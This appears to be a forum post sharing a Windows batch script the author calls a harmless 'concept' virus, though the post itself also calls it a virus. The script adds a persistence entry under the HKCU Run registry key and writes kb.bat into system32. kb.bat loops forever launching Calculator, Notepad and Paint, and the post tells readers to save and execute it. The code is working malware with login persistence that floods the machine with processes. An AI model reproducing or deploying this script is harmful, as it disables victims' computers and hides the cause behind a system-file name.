Hey all, this is not a virus, this is a concept, developed by me!! this can be developed in any language, I used Batch.
This virus got a Infinite Loop that will call Calculator Notepad and MS-Paint continuously, that’s all.
Save the Code in Notepad file with any name and .bat extension, and execute it.
Code:
@echo off
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v sysfile /t REG_SZ /d %systemroot%\system32\kb.bat /f
c:
cd\
cd %systemroot%\system32
echo @echo off > kb.bat
echo :hell >> kb.bat
echo start calc.exe >> kb.bat
echo start notepad.exe >> kb.bat
echo start mspaint.exe >> kb.bat
echo goto hell >> kb.bat